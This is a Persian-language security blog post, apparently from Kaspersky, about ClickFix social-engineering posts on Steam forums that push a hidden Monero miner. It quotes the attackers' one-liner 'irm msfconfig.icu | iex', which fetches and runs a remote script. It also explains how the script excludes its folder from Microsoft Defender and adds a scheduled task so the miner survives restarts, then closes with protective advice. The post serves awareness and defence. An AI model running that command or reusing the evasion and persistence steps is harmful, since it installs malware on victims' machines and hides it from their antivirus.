امسال شاهد رشد چشمگیر حملات ClickFix بودهایم. این روش آنقدر میان مجرمان سایبری محبوب شده که هنوز بررسی یک نوع از آن را تمام نکردهایم که نوع دیگری از راه میرسد.
این بار، مهاجمان گیمرها را هدف گرفتهاند. خبرنگاران حوزه فناوری پستهایی را در انجمنهای Steam شناسایی کردهاند که در قالب توصیههای فنی، دستورالعملهای مخرب را منتشر میکنند. در ادامه بررسی میکنیم این پستها چه ظاهری دارند، برای انتشار چه بدافزاری استفاده میشوند و چگونه میتوانید از سیستم خود محافظت کنید.
ClickFix راه خود را به انجمنهای Steam باز میکند
بسیاری از گیمرها برای دریافت کمک و راهنمایی درباره موضوعاتی مانند عبور از یک مرحله دشوار، ارتقای سطح، بهدست آوردن بهترین آیتمها یا برطرف کردن یک Bug به سایر بازیکنان در انجمنهای Steam مراجعه میکنند. مهاجمان نیز دقیقاً تصمیم گرفتهاند از همین اعتماد کاربران به توصیههای اعضای جامعه سوءاستفاده کنند.
حمله زمانی آغاز میشود که مجرمان به سؤال کاربری درباره Crash کردن بازی، ناپدید شدن آیتمهای Inventory یا سایر مشکلات فنی پاسخ میدهند. آنها در ظاهر بهعنوان کاربری که قصد کمک دارد، پیشنهاد میکنند PowerShell را با دسترسی Administrator اجرا کرده و دستوری را وارد کنند که ظاهراً مشکل کاربر را برطرف میکند.
مهاجم با پنهان کردن هدف واقعی خود در قالب یک توصیه برای عیبیابی، از کاربر میخواهد PowerShell را بهعنوان Administrator اجرا کند و دستوری را وارد کند که ظاهراً مشکل او را برطرف میکند.
همانطور که احتمالاً حدس میزنید، اجرای این دستور هیچ مشکلی را برطرف نمیکند و در عوض، مجموعهای از مشکلات جدید را به وجود میآورد.
اساس روش ClickFix همین است: استفاده از مهندسی اجتماعی برای فریب قربانی و وادار کردن او به انجام اقدامات ناامن، بهگونهای که خود کاربر شرایط لازم برای نفوذ به سیستمش را در اختیار مهاجمان قرار دهد.
پیشتر انواع دیگری از ترفندهای ClickFix را بررسی کردهایم؛ از CAPTCHAهای جعلی گرفته تا خطاهای ساختگی مرورگر. همه این روشها یک ویژگی مشترک دارند: قربانی را متقاعد میکنند که خودش دستور مخرب را اجرا کند.
نکته هوشمندانه استفاده از ClickFix در انجمنهای Steam این است که حمله فقط بازیکنی را که سؤال اولیه را مطرح کرده هدف قرار نمیدهد. بسیاری از گیمرهای دیگری که با همان مشکل مواجه میشوند و از طریق جستوجوی Google به آن پاسخ میرسند نیز ممکن است گرفتار حمله شوند.
نگاهی کوتاه به آنچه واقعاً پشت دستور irm | iex قرار دارد
پیش از بررسی اینکه مهاجمان با این روش واقعاً چه چیزی را روی سیستم گیمرها نصب میکنند، لازم است کمی با جزئیات فنی ماجرا آشنا شویم.
پستهای منتشرشده در انجمنهای Steam از قربانیان میخواهند دستور زیر را در PowerShell اجرا کنند:
irm msfconfig.icu | iex
برای کاربری که آشنایی زیادی با PowerShell ندارد، این دستور ممکن است نسبتاً بیخطر به نظر برسد. حتی ظاهر آن میتواند این تصور را ایجاد کند که دستور مربوط به اجرای MSConfig، ابزار داخلی پیکربندی سیستم Windows، با چند پارامتر اضافی است.
اما در واقعیت، این دستور بههیچوجه بیخطر نیست. بیایید اجزای آن را بررسی کنیم:
irm شکل کوتاهشده دستور داخلی Invoke-RestMethod در PowerShell است. این دستور به آدرس وب مشخصشده در ادامه خط متصل شده و دادههای دریافتی از آن را دریافت میکند.
icu بخشی از آدرس وب است و برخلاف چیزی که در نگاه اول ممکن است به نظر برسد، نام یک فایل محلی نیست. این آدرس به سرور مهاجمان مربوط میشود که در پاسخ به درخواست irm، یک Script مخرب PowerShell را ارسال میکند.
iex یکی دیگر از دستورات داخلی PowerShell و شکل کوتاهشده Invoke-Expression است. این دستور هر محتوایی را که irm از آدرس موردنظر دریافت کرده، بهعنوان کد PowerShell اجرا میکند.
بنابراین با اجرای این خط، یک Script از وبسایت مشخصشده دانلود شده و بلافاصله اجرا میشود.
یکی از کاربران Reddit به نکتهای اشاره کرده است: با حذف بخش دوم یعنی iex میتوان بدون اجرای Script، محتوایی را که قرار است دانلود شود مشاهده کرد. در این حالت، دستور فقط محتوای Script را دریافت کرده و آن را در پنجره PowerShell نمایش میدهد، بدون اینکه اجرا شود. به این ترتیب میتوان کدی را که از کاربر خواسته شده روی سیستمش اجرا کند، مشاهده کرد.
حالا ببینیم این کاربران بهظاهر کمککننده در انجمنهای Steam واقعاً قصد دارند چه چیزی را روی سیستم گیمرها نصب کنند.
یک Crypto Miner، نه ابزار بهینهسازی
مهاجمان برای باورپذیر کردن حمله وقت گذاشتهاند. Script مربوط به PowerShell که از سرور آنها دانلود میشود، بهشکل متقاعدکنندهای خود را شبیه یک ابزار بهینهسازی Windows نشان میدهد.
پس از اجرا، مجموعهای از پیامها به کاربر نمایش داده میشود که ادعا میکنند عملیات مختلفی در حال انجام است، از جمله:
- پاکسازی فایلهای موقت
- پاکسازی DNS Cache
- بهروزرسانی Driverها
- بررسی Disk برای یافتن خطا
- غیرفعال کردن برنامههای غیرضروری هنگام Startup
- اسکن سیستم برای یافتن بدافزار
- تعمیر Windows Image
- بررسی یکپارچگی فایلهای سیستم
Script مجموعهای از پیامها درباره عملیات جعلی بهینهسازی نمایش میدهد تا این تصور را ایجاد کند که واقعاً در حال انجام فرایندهای مفید نگهداری سیستم است.
اما فعالیت اصلی در پشت صحنه اتفاق میافتد.
Script ابتدا بررسی میکند که آیا با سطح دسترسی Administrator اجرا شده است یا خیر. اگر چنین دسترسیای داشته باشد، یک پوشه کاری مخفی در مسیر زیر ایجاد میکند:
C:\Windows\Background
سپس این پوشه را به فهرست Exclusionهای Microsoft Defender اضافه میکند. از این مرحله به بعد، فایلهایی که در این پوشه قرار میگیرند دیگر توسط آنتیویروس داخلی Windows اسکن نمیشوند.
در مرحله بعد، Script سیستم را برای ادامه حمله آماده میکند و یک فایل اجرایی را از سرور مهاجمان دانلود کرده و در همان پوشه C:\Windows\Background با نام ظاهراً قانونی زیر ذخیره میکند:
system.exe
فایل دانلودشده در واقع XMRig است؛ یکی از ابزارهای شناختهشده برای استخراج رمزارز Monero.
خود XMRig بدافزار نیست و یک ابزار قانونی و Open-Source برای استخراج رمزارز محسوب میشود. مشکل زمانی ایجاد میشود که مهاجمان آن را بدون اطلاع قربانی روی سیستم نصب میکنند.
پس از اجرا، توان پردازشی سیستم قربانی برای استخراج Monero مورد استفاده قرار میگیرد و رمزارز استخراجشده مستقیماً در اختیار مجرمان قرار میگیرد.
همین موضوع باعث میشود سیستمهای گیمرها اهداف بسیار جذابی باشند؛ کامپیوترهای Gaming مدرن معمولاً به CPU و GPUهای قدرتمندی مجهز هستند و دقیقاً همین سختافزارها برای استخراج رمزارز بسیار مناسباند.
برای اینکه Crypto Miner پس از Restart سیستم نیز فعال باقی بماند، Script یک Task جدید در Windows Task Scheduler با نام زیر ایجاد میکند:
XMRig-{computer name}
از آن پس، Crypto Miner با هر بار راهاندازی سیستم بهصورت خودکار اجرا میشود.
چگونه از سیستم خود در برابر Crypto Minerها و سایر بدافزارها محافظت کنیم؟
متأسفانه بسیاری از گیمرها تمایلی به نصب نرمافزارهای امنیتی روی سیستم خود یا فعال نگه داشتن آنها ندارند. دلیل اصلی این موضوع، باور قدیمی و نادرستی است که میگوید: «آنتیویروس باعث کند شدن بازی میشود.» پیشتر در وبلاگ کسپرسکی تحقیقاتی در این زمینه بررسی شده که نتایج آن نشان میدهد اجرای آنتیویروس هنگام بازی، تأثیر قابلتوجهی بر عملکرد سیستم ندارد.
اما درباره Crypto Minerها نمیتوان همین را گفت. این ابزارها قطعاً عملکرد سیستم را کاهش میدهند و علاوه بر آن، با تحت فشار قرار دادن سختافزار باعث استهلاک سریعتر آن میشوند.
پس برای محافظت از سیستم Gaming و حسابهای کاربری خود چه اقداماتی میتوانید انجام دهید؟
- از اجرای Scriptهای مربوط به PowerShell، Terminal یا سایر محیطهای Command Line که افراد ناشناس در انجمنها، Chatها یا بخش نظرات پیشنهاد میکنند، خودداری کنید.
- پیش از فشردن Enter برای اجرای هر دستوری که کاملاً با عملکرد آن آشنا نیستید، ابتدا بررسی کنید آن دستور چه کاری انجام میدهد و اجرای آن چه پیامدهایی میتواند داشته باشد.
- از یک راهکار امنیتی قابلاعتماد مجهز به Gaming Mode استفاده کنید تا تلاش برای دانلود بدافزار بهموقع شناسایی و از اجرای آن جلوگیری شود.
- هنگام بازی، راهکار امنیتی خود را غیرفعال نکنید. بهتر است از محصولی استفاده کنید که Gaming Mode اختصاصی داشته باشد. محصولات امنیتی Kaspersky بهمحض اجرای بازی، این حالت را بهصورت خودکار فعال میکنند و بهروزرسانی پایگاه داده آنتیویروس، Notificationها و اسکنهای زمانبندیشده Disk را تا پایان بازی به تعویق میاندازند.